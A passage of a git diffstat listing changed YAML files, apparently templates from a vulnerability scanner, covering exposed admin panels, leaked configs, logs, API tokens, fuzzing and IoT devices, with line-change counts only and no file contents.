4 +- http/exposed-panels/wago-plc-panel.yaml | 5 +- http/exposed-panels/wagtail-cms-detect.yaml | 5 +- .../wallix-accessmanager-panel.yaml | 3 +- http/exposed-panels/wampserver-homepage.yaml | 4 +- http/exposed-panels/watcher-panel.yaml | 2 +- http/exposed-panels/watchguard-panel.yaml | 4 +- http/exposed-panels/watershed-panel.yaml | 4 +- http/exposed-panels/wazuh-panel.yaml | 2 +- http/exposed-panels/wd-mycloud-panel.yaml | 2 +- http/exposed-panels/weatherlink.yaml | 5 +- .../exposed-panels/weave-scope-dashboard.yaml | 4 +- http/exposed-panels/web-file-manager.yaml | 4 +- http/exposed-panels/web-local-craft.yaml | 5 +- http/exposed-panels/web-service-panel.yaml | 5 +- http/exposed-panels/web-viewer-panel.yaml | 4 +- http/exposed-panels/webcomco-panel.yaml | 5 +- .../webeditors-check-detect.yaml | 4 +- http/exposed-panels/weblogic-login.yaml | 2 +- .../exposed-panels/weblogic-uddiexplorer.yaml | 4 +- http/exposed-panels/webmin-panel.yaml | 5 +- http/exposed-panels/webmodule-ee-panel.yaml | 4 +- http/exposed-panels/webpagetest-panel.yaml | 2 +- http/exposed-panels/webroot-login.yaml | 4 +- .../exposed-panels/webshell4-login-panel.yaml | 5 +- http/exposed-panels/webuzo-admin-panel.yaml | 5 +- http/exposed-panels/weiphp-panel.yaml | 6 +- http/exposed-panels/whm-login-detect.yaml | 4 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/wmw-enterprise-panel.yaml | 4 +- http/exposed-panels/wordpress-login.yaml | 4 +- http/exposed-panels/workresources-rdp.yaml | 2 +- http/exposed-panels/workspace-one-uem.yaml | 4 +- .../wowza-streaming-engine.yaml | 1 + .../ws_ftp-server-web-transfer.yaml | 6 +- .../wso2-management-console.yaml | 2 +- http/exposed-panels/xds-amr-status.yaml | 2 +- http/exposed-panels/xeams-admin-console.yaml | 5 +- http/exposed-panels/xenmobile-login.yaml | 5 +- http/exposed-panels/xfinity-panel.yaml | 4 +- .../xiaomi-wireless-router-login.yaml | 2 +- http/exposed-panels/xibocms-login.yaml | 4 +- http/exposed-panels/xnat-login.yaml | 4 +- .../xoops/xoops-installation-wizard.yaml | 2 +- http/exposed-panels/xvr-login.yaml | 2 +- http/exposed-panels/xweb500-panel.yaml | 2 +- http/exposed-panels/xxljob-panel.yaml | 5 +- .../exposed-panels/yarn-manager-exposure.yaml | 3 +- http/exposed-panels/yellowfin-panel.yaml | 3 +- http/exposed-panels/yopass-panel.yaml | 2 +- http/exposed-panels/yzmcms-panel.yaml | 2 +- http/exposed-panels/zabbix-server-login.yaml | 3 +- .../zblog-exposed-admin-panel.yaml | 4 +- http/exposed-panels/zblogphp-panel.yaml | 2 +- http/exposed-panels/zenario-login-panel.yaml | 4 +- http/exposed-panels/zentao-detect.yaml | 5 +- http/exposed-panels/zentral-panel.yaml | 10 +- http/exposed-panels/zeroshell-login.yaml | 2 +- http/exposed-panels/zimbra-web-client.yaml | 10 +- http/exposed-panels/zimbra-web-login.yaml | 11 +- http/exposed-panels/zipkin-exposure.yaml | 5 +- .../zoho/manageengine-adaudit.yaml | 11 +- .../zoho/manageengine-adselfservice.yaml | 4 +- .../zoho/manageengine-analytics.yaml | 2 +- .../zoho/manageengine-apex-helpdesk.yaml | 2 +- .../manageengine-applications-manager.yaml | 4 +- .../zoho/manageengine-assetexplorer.yaml | 2 +- .../zoho/manageengine-desktop.yaml | 2 +- .../zoho/manageengine-keymanagerplus.yaml | 12 +- .../zoho/manageengine-network-config.yaml | 4 +- .../zoho/manageengine-opmanager.yaml | 8 +- .../zoho/manageengine-servicedesk.yaml | 2 +- .../zoho/manageengine-supportcenter.yaml | 2 +- http/exposed-panels/zoneminder-login.yaml | 5 +- http/exposed-panels/zte-panel.yaml | 10 +- http/exposed-panels/zuul-panel.yaml | 9 +- http/exposed-panels/zyxel-router-panel.yaml | 5 +- .../zyxel/zyxel-firewall-panel.yaml | 4 +- .../zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- .../zyxel/zyxel-vsg1432b101-login.yaml | 2 +- .../exposures/apis/couchbase-buckets-api.yaml | 8 +- .../apis/drupal-jsonapi-user-listing.yaml | 4 +- http/exposures/apis/jeecg-boot-swagger.yaml | 2 +- http/exposures/apis/openapi.yaml | 4 +- http/exposures/apis/seafile-api.yaml | 2 +- http/exposures/apis/strapi-page.yaml | 2 +- http/exposures/apis/swagger-api.yaml | 4 +- http/exposures/apis/wadl-api.yaml | 4 +- http/exposures/apis/wsdl-api.yaml | 5 +- .../backups/exposed-mysql-initial.yaml | 4 +- .../backups/froxlor-database-backup.yaml | 2 +- http/exposures/backups/php-backup-files.yaml | 55 +- .../exposures/backups/settings-php-files.yaml | 2 +- http/exposures/backups/sql-dump.yaml | 6 +- http/exposures/backups/zip-backup-files.yaml | 37 +- .../exposures/configs/accueil-wampserver.yaml | 2 +- .../airflow-configuration-exposure.yaml | 3 +- .../configs/alibaba-canal-info-leak.yaml | 7 +- .../configs/amazon-docker-config.yaml | 3 +- .../configs/ansible-config-disclosure.yaml | 3 +- http/exposures/configs/apache-config.yaml | 2 +- .../configs/appspec-yml-disclosure.yaml | 2 +- .../configs/appveyor-configuration-file.yaml | 3 +- http/exposures/configs/aws-config.yaml | 2 +- http/exposures/configs/aws-credentials.yaml | 2 +- http/exposures/configs/awstats-config.yaml | 4 +- http/exposures/configs/awstats-script.yaml | 4 +- .../configs/azure-domain-tenant.yaml | 4 +- .../configs/babel-config-exposure.yaml | 4 +- http/exposures/configs/behat-config.yaml | 3 +- http/exposures/configs/blazor-boot.yaml | 2 +- http/exposures/configs/cakephp-config.yaml | 3 +- http/exposures/configs/cgi-printenv.yaml | 2 +- http/exposures/configs/circleci-config.yaml | 2 +- .../configs/circleci-ssh-config.yaml | 2 +- .../configs/cisco-network-config.yaml | 4 +- .../exposures/configs/codeception-config.yaml | 2 +- http/exposures/configs/codeigniter-env.yaml | 2 +- .../configs/collibra-properties.yaml | 4 +- http/exposures/configs/composer-config.yaml | 4 +- http/exposures/configs/config-json.yaml | 3 +- http/exposures/configs/config-properties.yaml | 1 + http/exposures/configs/config-rb.yaml | 3 +- .../configs/configuration-listing.yaml | 2 +- .../configs/coremail-config-disclosure.yaml | 2 +- .../exposures/configs/cypress-web-config.yaml | 4 +- .../configs/dbeaver-credentials.yaml | 5 +- http/exposures/configs/debug-vars.yaml | 2 +- .../configs/detect-drone-config.yaml | 3 +- .../configs/django-variables-exposed.yaml | 4 +- .../configs/docker-compose-config.yaml | 3 +- .../configs/dockerfile-hidden-disclosure.yaml | 2 +- http/exposures/configs/editor-exposure.yaml | 2 +- http/exposures/configs/esmtprc-config.yaml | 2 +- .../configs/exposed-authentication-asmx.yaml | 4 +- http/exposures/configs/exposed-bitkeeper.yaml | 2 +- http/exposures/configs/exposed-bzr.yaml | 4 +- http/exposures/configs/exposed-darcs.yaml | 4 +- http/exposures/configs/exposed-gitignore.yaml | 4 +- http/exposures/configs/exposed-hg.yaml | 2 +- .../configs/exposed-sharepoint-list.yaml | 2 +- http/exposures/configs/exposed-svn.yaml | 2 +- http/exposures/configs/exposed-vscode.yaml | 3 +- .../configs/firebase-config-exposure.yaml | 3 +- .../configs/ftp-credentials-exposure.yaml | 2 +- .../configs/gcloud-config-default.yaml | 5 +- .../configs/git-config-nginxoffbyslash.yaml | 2 +- .../configs/git-credentials-disclosure.yaml | 3 +- .../configs/github-workflows-disclosure.yaml | 2 +- .../configs/gmail-api-client-secrets.yaml | 6 +- http/exposures/configs/golangci-config.yaml | 5 +- .../exposures/configs/gruntfile-exposure.yaml | 5 +- http/exposures/configs/guard-config.yaml | 4 +- .../configs/hikvision-info-leak.yaml | 2 +- .../configs/honeywell-scada-config.yaml | 2 +- .../configs/hp-ilo-serial-key-disclosure.yaml | 2 +- .../exposures/configs/htpasswd-detection.yaml | 2 +- http/exposures/configs/httpd-config.yaml | 4 +- http/exposures/configs/javascript-env.yaml | 3 +- .../configs/jetbrains-datasources.yaml | 4 +- http/exposures/configs/jkstatus-manager.yaml | 4 +- .../exposures/configs/joomla-config-file.yaml | 2 +- http/exposures/configs/karma-config-js.yaml | 3 +- .../configs/keycloak-openid-config.yaml | 4 +- .../kubernetes-kustomization-disclosure.yaml | 2 +- .../configs/kyan-credential-exposure.yaml | 5 +- http/exposures/configs/laravel-env.yaml | 2 +- .../configs/lvmeng-uts-disclosure.yaml | 5 +- .../configs/magento-config-disclosure.yaml | 3 +- .../exposures/configs/mercurial-hgignore.yaml | 4 +- http/exposures/configs/msmtp-config.yaml | 2 +- .../exposures/configs/nagios-status-page.yaml | 2 +- http/exposures/configs/netbeans-config.yaml | 4 +- http/exposures/configs/netrc.yaml | 4 +- http/exposures/configs/nginx-config.yaml | 5 +- .../configs/opcache-status-exposure.yaml | 5 +- .../configs/oracle-cgi-printenv.yaml | 2 +- .../configs/oracle-ebs-credentials.yaml | 2 +- .../configs/ovpn-config-exposed.yaml | 3 +- http/exposures/configs/owncloud-config.yaml | 6 +- http/exposures/configs/package-json.yaml | 2 +- http/exposures/configs/parameters-config.yaml | 3 +- http/exposures/configs/perl-status.yaml | 5 +- .../configs/phalcon-framework-source.yaml | 2 +- http/exposures/configs/php-fpm-config.yaml | 4 +- http/exposures/configs/phpcs-config.yaml | 4 +- http/exposures/configs/phpinfo-files.yaml | 1 + http/exposures/configs/phpsec-config.yaml | 5 +- http/exposures/configs/phpstan-config.yaml | 4 +- http/exposures/configs/phpsys-info.yaml | 62 +- http/exposures/configs/pipfile-config.yaml | 4 +- http/exposures/configs/platformio-ini.yaml | 2 +- http/exposures/configs/plesk-stat.yaml | 6 +- http/exposures/configs/pre-commit-config.yaml | 7 +- http/exposures/configs/procfile-config.yaml | 5 +- http/exposures/configs/proftpd-config.yaml | 4 +- .../exposures/configs/prometheus-metrics.yaml | 1 + http/exposures/configs/protractor-config.yaml | 2 +- .../configs/proxy-wpad-exposure.yaml | 4 +- http/exposures/configs/psalm-config.yaml | 4 +- http/exposures/configs/pubspec-config.yaml | 5 +- http/exposures/configs/pyproject-toml.yaml | 4 +- http/exposures/configs/qdpm-info-leak.yaml | 2 +- http/exposures/configs/rackup-config-ru.yaml | 4 +- .../configs/rails-database-config.yaml | 6 +- .../configs/rakefile-disclosure.yaml | 2 +- http/exposures/configs/redis-config.yaml | 2 +- .../configs/robomongo-credential.yaml | 6 +- http/exposures/configs/rollup-js-config.yaml | 4 +- http/exposures/configs/rubocop-config.yaml | 4 +- .../ruijie-information-disclosure.yaml | 9 +- .../configs/ruijie-nbr1300g-exposure.yaml | 2 +- http/exposures/configs/ruijie-phpinfo.yaml | 6 +- http/exposures/configs/s3cfg-config.yaml | 6 +- http/exposures/configs/s3cmd-config.yaml | 4 +- .../configs/saia-web-server-info.yaml | 10 +- http/exposures/configs/samba-config.yaml | 4 +- .../exposures/configs/scrutinizer-config.yaml | 4 +- .../configs/server-private-keys.yaml | 5 +- .../configs/sftp-config-exposure.yaml | 10 +- .../configs/sftp-credentials-exposure.yaml | 2 +- .../configs/sftp-deployment-config.yaml | 6 +- .../configs/ssh-authorized-keys.yaml | 6 +- http/exposures/configs/ssh-known-hosts.yaml | 10 +- http/exposures/configs/stestr-config.yaml | 4 +- http/exposures/configs/svnserve-config.yaml | 4 +- .../configs/symfony-database-config.yaml | 5 +- http/exposures/configs/symfony-profiler.yaml | 4 +- .../configs/symfony-security-config.yaml | 4 +- http/exposures/configs/tox-ini.yaml | 6 +- http/exposures/configs/ventrilo-config.yaml | 6 +- http/exposures/configs/web-config.yaml | 4 +- http/exposures/configs/webpack-config.yaml | 2 +- http/exposures/configs/websheets-config.yaml | 7 +- http/exposures/configs/wgetrc-config.yaml | 5 +- http/exposures/configs/wpconfig-aws-keys.yaml | 2 +- http/exposures/configs/xprober-service.yaml | 9 +- http/exposures/configs/yii-debugger.yaml | 3 +- http/exposures/configs/zend-config-file.yaml | 3 +- http/exposures/files/angular-json.yaml | 3 +- http/exposures/files/apache-licenserc.yaml | 2 +- .../files/appsettings-file-disclosure.yaml | 3 +- http/exposures/files/atom-sync-remote.yaml | 2 +- http/exposures/files/axis-happyaxis.yaml | 3 +- .../files/azure-pipelines-exposed.yaml | 3 +- http/exposures/files/bitbucket-pipelines.yaml | 2 +- http/exposures/files/bower-json.yaml | 2 +- http/exposures/files/build-properties.yaml | 3 +- http/exposures/files/bun-lock.yaml | 2 +- http/exposures/files/cargo-lock-package.yaml | 2 +- http/exposures/files/cargo-toml-file.yaml | 2 +- http/exposures/files/cloud-config.yaml | 3 +- http/exposures/files/composer-auth-json.yaml | 3 +- http/exposures/files/core-dump.yaml | 2 +- http/exposures/files/credentials-json.yaml | 3 +- http/exposures/files/crossdomain-xml.yaml | 3 +- .../exposures/files/database-credentials.yaml | 2 +- http/exposures/files/db-schema.yaml | 3 +- http/exposures/files/db-xml-file.yaml | 3 +- .../files/dbeaver-database-connections.yaml | 4 +- http/exposures/files/django-secret-key.yaml | 4 +- http/exposures/files/docker-cloud.yaml | 3 +- http/exposures/files/domcfg-page.yaml | 2 +- http/exposures/files/ds-store-file.yaml | 6 +- http/exposures/files/dwsync-exposure.yaml | 2 +- http/exposures/files/environment-rb.yaml | 3 +- http/exposures/files/exposed-alps-spring.yaml | 5 +- http/exposures/files/filezilla.yaml | 4 +- http/exposures/files/ftpconfig.yaml | 4 +- http/exposures/files/gcloud-access-token.yaml | 3 +- http/exposures/files/gcloud-credentials.yaml | 3 +- .../files/get-access-token-json.yaml | 3 +- http/exposures/files/git-mailmap.yaml | 3 +- .../exposures/files/github-gemfile-files.yaml | 4 +- http/exposures/files/github-page-config.yaml | 2 +- .../glpi-status-ldap-domain-disclosure.yaml | 2 +- http/exposures/files/go-mod-disclosure.yaml | 2 +- .../files/google-api-private-key.yaml | 3 +- .../exposures/files/google-services-json.yaml | 3 +- http/exposures/files/gradle-libs.yaml | 3 +- .../files/iceflow-vpn-disclosure.yaml | 5 +- .../exposures/files/idea-folder-exposure.yaml | 2 +- .../files/ioncube-loader-wizard.yaml | 2 +- .../exposures/files/jetbrains-webservers.yaml | 5 +- http/exposures/files/joomla-file-listing.yaml | 4 +- http/exposures/files/jsapi-ticket-json.yaml | 2 +- .../exposures/files/kubernetes-etcd-keys.yaml | 2 +- http/exposures/files/lazy-file.yaml | 4 +- http/exposures/files/npm-anonymous-cli.yaml | 3 +- .../exposures/files/npm-cli-metrics-json.yaml | 3 +- .../files/npm-shrinkwrap-exposure.yaml | 2 +- http/exposures/files/npmrc-authtoken.yaml | 2 +- .../exposures/files/nuget-package-config.yaml | 3 +- .../files/oauth-credentials-json.yaml | 2 +- .../files/openstack-user-secrets.yaml | 3 +- http/exposures/files/oracle-test-cgi.yaml | 2 +- http/exposures/files/pantheon-upstream.yaml | 2 +- http/exposures/files/php-ini.yaml | 3 +- .../files/php-user-ini-disclosure.yaml | 2 +- .../files/phpunit-result-cache-exposure.yaml | 2 +- http/exposures/files/phpunit.yaml | 4 +- .../files/pipeline-configuration.yaml | 2 +- http/exposures/files/pipfile-lock.yaml | 2 +- http/exposures/files/pnpm-lock.yaml | 2 +- .../files/putty-private-key-disclosure.yaml | 3 +- .../exposures/files/pyproject-disclosure.yaml | 2 +- .../files/rails-secret-token-disclosure.yaml | 2 +- http/exposures/files/reactapp-env-js.yaml | 2 +- http/exposures/files/redmine-config.yaml | 3 +- http/exposures/files/redmine-settings.yaml | 3 +- http/exposures/files/routes-ini.yaml | 5 +- http/exposures/files/ruby-rail-storage.yaml | 3 +- .../files/salesforce-credentials.yaml | 3 +- http/exposures/files/sass-lint.yaml | 2 +- http/exposures/files/secret-token-rb.yaml | 3 +- http/exposures/files/secrets-file.yaml | 3 +- http/exposures/files/sendgrid-env.yaml | 2 +- .../files/sensitive-storage-exposure.yaml | 3 +- .../files/service-account-credentials.yaml | 3 +- http/exposures/files/shellscripts.yaml | 2 +- .../files/snyk-ignore-file-disclosure.yaml | 2 +- http/exposures/files/socks5-vpn-config.yaml | 2 +- .../files/styleci-yml-disclosure.yaml | 2 +- http/exposures/files/svn-wc-db.yaml | 3 +- .../files/symfony-properties-ini.yaml | 3 +- http/exposures/files/symfony-security.yaml | 3 +- http/exposures/files/token-info-json.yaml | 3 +- http/exposures/files/token-json.yaml | 3 +- .../exposures/files/travis-ci-disclosure.yaml | 3 +- http/exposures/files/uwsgi-ini.yaml | 2 +- .../exposures/files/vagrantfile-exposure.yaml | 2 +- http/exposures/files/viminfo-disclosure.yaml | 2 +- http/exposures/files/vscode-sftp.yaml | 3 +- http/exposures/files/webpack-mix-js.yaml | 2 +- .../files/webpack-sourcemap-disclosure.yaml | 4 +- .../files/wget-hsts-list-exposure.yaml | 2 +- .../files/wordpress-readme-file.yaml | 3 +- http/exposures/files/wp-cli-exposure.yaml | 2 +- http/exposures/files/ws-ftp-ini.yaml | 3 +- .../files/xampp-environment-variables.yaml | 2 +- http/exposures/files/yarn-lock.yaml | 1 - http/exposures/logs/access-log.yaml | 2 +- http/exposures/logs/badarg-log.yaml | 2 +- http/exposures/logs/clockwork-php-page.yaml | 3 +- http/exposures/logs/darkstat-detect.yaml | 4 +- http/exposures/logs/development-logs.yaml | 2 +- .../exposures/logs/django-debug-exposure.yaml | 2 +- .../exposures/logs/dozzle-container-logs.yaml | 2 +- http/exposures/logs/elmah-log-file.yaml | 3 +- http/exposures/logs/error-logs.yaml | 3 +- .../logs/event-debug-server-status.yaml | 2 +- http/exposures/logs/exposed-glances-api.yaml | 2 +- http/exposures/logs/fastcgi-echo.yaml | 2 +- http/exposures/logs/ffserver-status.yaml | 2 +- http/exposures/logs/firebase-debug-log.yaml | 2 +- http/exposures/logs/git-exposure.yaml | 3 +- http/exposures/logs/git-logs-exposure.yaml | 2 +- http/exposures/logs/idea-logs-exposure.yaml | 4 +- .../exposures/logs/jboss-seam-debug-page.yaml | 2 +- http/exposures/logs/laravel-log-file.yaml | 4 +- http/exposures/logs/laravel-telescope.yaml | 5 +- http/exposures/logs/milesight-system-log.yaml | 2 +- http/exposures/logs/nginx-shards.yaml | 1 + http/exposures/logs/npm-debug-log.yaml | 3 +- http/exposures/logs/npm-log-file.yaml | 3 +- http/exposures/logs/opentsdb-status.yaml | 4 +- .../logs/oracle-ebs-sqllog-disclosure.yaml | 2 +- http/exposures/logs/php-debug-bar.yaml | 2 +- http/exposures/logs/production-log.yaml | 3 +- http/exposures/logs/production-logs.yaml | 2 +- .../exposures/logs/pyramid-debug-toolbar.yaml | 2 +- http/exposures/logs/rails-debug-mode.yaml | 4 +- .../exposures/logs/redis-exception-error.yaml | 2 +- .../logs/roundcube-log-disclosure.yaml | 6 +- .../logs/squid-analysis-report-generator.yaml | 6 +- http/exposures/logs/struts-debug-mode.yaml | 2 +- .../exposures/logs/struts-problem-report.yaml | 2 +- http/exposures/logs/trace-axd-detect.yaml | 4 +- .../logs/webalizer-xtended-stats.yaml | 2 +- http/exposures/logs/wp-app-log.yaml | 2 +- http/exposures/logs/ws-ftp-log.yaml | 3 +- http/exposures/logs/yii-error-page.yaml | 2 +- http/exposures/logs/zm-system-log-detect.yaml | 5 +- .../tokens/adafruit/adafruit-api-key.yaml | 4 +- .../tokens/adobe/adobe-client-id.yaml | 2 +- .../tokens/adobe/adobe-oauth-secret.yaml | 4 +- http/exposures/tokens/age/age-public-key.yaml | 4 +- http/exposures/tokens/age/age-secret-key.yaml | 4 +- .../tokens/airtable/airtable-api-key.yaml | 2 +- .../tokens/algolia/algolia-api-key.yaml | 4 +- .../tokens/alibaba/alibaba-accesskey-id.yaml | 4 +- .../tokens/alibaba/alibaba-secretkey-id.yaml | 4 +- .../tokens/amazon/amazon-mws-auth-token.yaml | 2 +- .../tokens/amazon/amazon-sns-topic.yaml | 5 +- .../tokens/amazon/aws-access-key-value.yaml | 2 +- .../tokens/amazon/aws-access-secret-key.yaml | 2 +- .../tokens/amazon/aws-account-id.yaml | 4 +- http/exposures/tokens/amazon/aws-api-key.yaml | 4 +- .../tokens/amazon/aws-session-token.yaml | 4 +- .../artifactory/artifactory-api-password.yaml | 4 +- .../artifactory/artifactory-api-token.yaml | 4 +- .../tokens/asana/asana-client-id.yaml | 4 +- .../tokens/asana/asana-client-secret.yaml | 4 +- .../tokens/atlassian/atlassian-token.yaml | 4 +- .../tokens/azure/azure-apim-secretkey.yaml | 2 +- .../tokens/azure/azure-connection.yaml | 4 +- .../exposures/tokens/beamer/beamer-token.yaml | 4 +- .../tokens/bitbucket/bitbucket-clientid.yaml | 4 +- .../bitbucket/bitbucket-clientsecret.yaml | 4 +- .../tokens/bitly/bitly-secret-key.yaml | 4 +- .../tokens/bittrex/bittrex-accesskey.yaml | 4 +- .../tokens/bittrex/bittrex-secretkey.yaml | 4 +- .../tokens/clojars/clojars-token.yaml | 4 +- .../cloudinary/cloudinary-credentials.yaml | 4 +- .../tokens/codeclimate/codeclimate-token.yaml | 4 +- .../tokens/codecov/codecov-accesstoken.yaml | 4 +- .../tokens/coinbase/coinbase-accesstoken.yaml | 4 +- .../confluent/confluent-accesstoken.yaml | 4 +- .../tokens/confluent/confluent-secretkey.yaml | 4 +- .../tokens/contentful/contentful-token.yaml | 4 +- .../tokens/crates/crates-api-key.yaml | 4 +- .../tokens/databricks/databricks-token.yaml | 4 +- .../tokens/datadog/datadog-accesstoken.yaml | 4 +- .../axiom-digitalocean-key-exposure.yaml | 4 +- .../digital-ocean-personal-token.yaml | 4 +- .../digitalocean/digitalocean-app-token.yaml | 4 +- .../digitalocean/digitalocean-refresh.yaml | 4 +- .../digitalocean/tugboat-config-exposure.yaml | 2 +- .../tokens/discord/discord-clientid.yaml | 4 +- .../tokens/discord/discord-clientsecret.yaml | 4 +- .../tokens/discord/discord-token.yaml | 4 +- .../tokens/discord/discord-webhook.yaml | 4 +- .../tokens/docker/dockercfg-config.yaml | 3 +- .../tokens/doppler/doppler-token.yaml | 4 +- .../tokens/droneci/droneci-accesstoken.yaml | 4 +- .../tokens/dropbox/dropbox-long-token.yaml | 4 +- .../tokens/dropbox/dropbox-short-token.yaml | 4 +- .../tokens/dropbox/dropbox-token.yaml | 4 +- .../exposures/tokens/duffel/duffel-token.yaml | 4 +- .../tokens/dynatrace/dynatrace-api-token.yaml | 4 +- .../tokens/easypost/easypost-testtoken.yaml | 4 +- .../tokens/easypost/easypost-token.yaml | 4 +- .../tokens/etsy/etsy-accesstoken.yaml | 4 +- .../facebook/facebook-access-token.yaml | 4 +- .../tokens/facebook/facebook-token.yaml | 4 +- .../exposures/tokens/fastly/fastly-token.yaml | 4 +- .../tokens/figma/figma-personal-token.yaml | 4 +- .../finicity/finicity-clientsecret.yaml | 4 +- .../tokens/finicity/finicity-token.yaml | 4 +- .../tokens/finnhub/finnhub-accesstoken.yaml | 4 +- .../tokens/flickr/flickr-accesstoken.yaml | 4 +- .../flutter/flutterwave-encryptionkey.yaml | 4 +- .../tokens/flutter/flutterwave-publickey.yaml | 4 +- .../tokens/flutter/flutterwave-secretkey.yaml | 4 +- .../tokens/frameio/frameio-token.yaml | 4 +- .../freshbooks/freshbooks-accesstoken.yaml | 4 +- .../generic/credentials-disclosure.yaml | 4125 ++++++++++++++--- .../tokens/generic/general-tokens.yaml | 2 +- .../generic/jdbc-connection-string.yaml | 4 +- http/exposures/tokens/generic/jwt-token.yaml | 4 +- .../tokens/generic/shoppable-token.yaml | 2 +- http/exposures/tokens/github/github-app.yaml | 4 +- .../tokens/github/github-oauth-access.yaml | 4 +- .../tokens/github/github-personal-access.yaml | 4 +- .../tokens/github/github-refresh.yaml | 4 +- .../tokens/gitlab/gitlab-personal-token.yaml | 4 +- .../tokens/gitlab/gitlab-pipeline-token.yaml | 4 +- .../tokens/gitlab/gitlab-runner-token.yaml | 4 +- .../exposures/tokens/gitter/gitter-token.yaml | 4 +- .../tokens/gocardless/gocardless-token.yaml | 4 +- .../tokens/google/fcm-server-key.yaml | 4 +- .../tokens/google/google-api-key.yaml | 2 +- .../tokens/google/google-calendar-link.yaml | 4 +- .../tokens/google/google-client-id.yaml | 4 +- .../tokens/google/google-oauth-prefixed.yaml | 4 +- .../tokens/google/oauth-access-key.yaml | 2 +- .../tokens/grafana/grafana-cloud-token.yaml | 4 +- .../exposures/tokens/grafana/grafana-key.yaml | 4 +- .../grafana/grafana-serviceaccount-token.yaml | 4 +- .../tokens/hashicorp/hashicorp-token.yaml | 4 +- .../tokens/heroku/heroku-api-key.yaml | 4 +- .../tokens/jenkins/jenkins-crumb-token.yaml | 4 +- .../tokens/jotform/jotform-api-key.yaml | 2 +- .../tokens/loqate/loqate-api-key.yaml | 2 +- .../tokens/mailchimp/mailchimp-api-key.yaml | 2 +- .../tokens/mailgun/mailgun-api-token.yaml | 4 +- .../mapbox/mapbox-token-disclosure.yaml | 2 +- .../microsoft/microsoft-teams-webhook.yaml | 3 +- .../newrelic/newrelic-admin-api-key.yaml | 5 +- .../newrelic/newrelic-insights-key.yaml | 5 +- .../newrelic/newrelic-pixie-api-key.yaml | 4 +- .../newrelic/newrelic-pixie-deploy-key.yaml | 4 +- .../newrelic/newrelic-rest-api-key.yaml | 5 +- .../newrelic-synthetics-location-key.yaml | 5 +- .../tokens/nextjs/cipher-secret-key.yaml | 2 +- .../tokens/npm/npm-access-token.yaml | 4 +- .../exposures/tokens/nuget/nuget-api-key.yaml | 4 +- .../tokens/openai/openai-api-key.yaml | 4 +- .../tokens/paypal/braintree-access-token.yaml | 3 +- .../tokens/picatic/picatic-api-key.yaml | 5 +- .../exposures/tokens/postman/postman-key.yaml | 2 +- .../tokens/pypi/pypi-upload-token.yaml | 4 +- .../razorpay-clientid-disclosure.yaml | 2 +- .../tokens/ruby/rubygems-api-key.yaml | 4 +- http/exposures/tokens/sauce/sauce-token.yaml | 4 +- .../tokens/segment/segment-public-token.yaml | 4 +- .../tokens/sendgrid/sendgrid-api-key.yaml | 3 +- .../tokens/shopify/shopify-app-secret.yaml | 4 +- .../shopify/shopify-customapp-token.yaml | 4 +- .../tokens/shopify/shopify-legacy-token.yaml | 4 +- .../tokens/shopify/shopify-public-token.yaml | 4 +- .../tokens/slack/slack-bot-token.yaml | 4 +- .../tokens/slack/slack-user-token.yaml | 4 +- .../tokens/slack/slack-webhook-token.yaml | 4 +- .../tokens/sonarqube/sonarqube-token.yaml | 3 +- .../tokens/square/square-access.yaml | 4 +- .../square/square-oauth-secret-token.yaml | 4 +- .../tokens/stackhawk/stackhawk-api.yaml | 4 +- .../tokens/stripe/stripe-restricted-key.yaml | 3 +- .../tokens/stripe/stripe-secret-key.yaml | 3 +- .../tokens/telegram/telegram-bot-token.yaml | 4 +- .../tokens/twilio/twilio-api-key.yaml | 2 +- .../exposures/tokens/zendesk/zendesk-key.yaml | 4 +- .../tokens/zenserp/zenscrape-api-key.yaml | 3 +- .../tokens/zenserp/zenserp-api-key.yaml | 3 +- .../tokens/zoho/zoho-webhook-token.yaml | 3 +- http/fuzzing/cache-poisoning-fuzz.yaml | 5 +- http/fuzzing/header-command-injection.yaml | 6 +- http/fuzzing/iis-shortname.yaml | 7 +- http/fuzzing/linux-lfi-fuzzing.yaml | 3 +- http/fuzzing/mdb-database-file.yaml | 8 +- http/fuzzing/prestashop-module-fuzz.yaml | 3 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 3 +- http/fuzzing/waf-fuzz.yaml | 2 - http/fuzzing/wordpress-plugins-detect.yaml | 4 +- http/fuzzing/wordpress-themes-detect.yaml | 4 +- http/fuzzing/wordpress-weak-credentials.yaml | 5 +- http/fuzzing/xff-403-bypass.yaml | 6 +- http/iot/ampguard-wifi-setup.yaml | 2 +- http/iot/apc-ups-login.yaml | 4 +- http/iot/automation-direct.yaml | 2 +- http/iot/brother-printer-detect.yaml | 4 +- http/iot/brother-unauthorized-access.yaml | 2 +- http/iot/codian-mcu-login.yaml | 3 +- http/iot/contacam.yaml | 5 +- http/iot/envision-gateway.yaml | 5 +- http/iot/epmp-login.yaml | 12 +- http/iot/epson-wf-series.yaml | 4 +- http/iot/heatmiser-wifi-thermostat.yaml | 5 +- http/iot/homeworks-illumination.yaml | 2 +- http/iot/hp-color-laserjet-detect.yaml | 3 +- http/iot/hp-device-info-detect.yaml | 3 +- http/iot/hp-laserjet-detect.yaml | 14 +- http/iot/internet-service.yaml | 13 +- http/iot/iotawatt-app-exposure.yaml | 2 +- http/iot/kevinlab-device-detect.yaml | 5 +- http/iot/liveview-axis-camera.yaml | 6 +- http/iot/loytec-device.yaml | 2 +- http/iot/mobotix-guest-camera.yaml | 7 +- http/iot/netsurveillance-web.yaml | 4 +- http/iot/network-camera-detect.yaml | 3 +- http/iot/novus-ip-camera.yaml | 12 +- http/iot/nuuno-network-login.yaml | 12 +- http/iot/octoprint-3dprinter-detect.yaml | 5 +- http/iot/open-mjpg-streamer.yaml | 3 +- http/iot/panasonic-network-management.yaml | 4 +- http/iot/pqube-power-analyzers.yaml | 2 +- http/iot/qvisdvr-deserialization-rce.yaml | 6 +- http/iot/raspberry-shake-config.yaml | 2 +- http/iot/routeros-login.yaml | 4 +- http/iot/selea-ip-camera.yaml | 4 +- http/iot/snapdrop-detect.yaml | 2 +- http/iot/stem-audio-table-private-keys.yaml | 2 +- http/iot/targa-camera-lfi.yaml | 5 +- http/iot/targa-camera-ssrf.yaml | 7 +- http/iot/ulanzi-clock.yaml | 2 +- http/iot/upnp-device.yaml | 3 +- http/iot/webcamxp-5.yaml | 5 +- http/iot/xp-webcam.yaml | 2 +- http/iot/zebra-printer-detect.yaml | 2 +- .../apple-app-site-association.yaml | 5 +- .../aws-ecs-container-agent-tasks.yaml | 4 +- http/miscellaneous/clientaccesspolicy.yaml | 4 +- 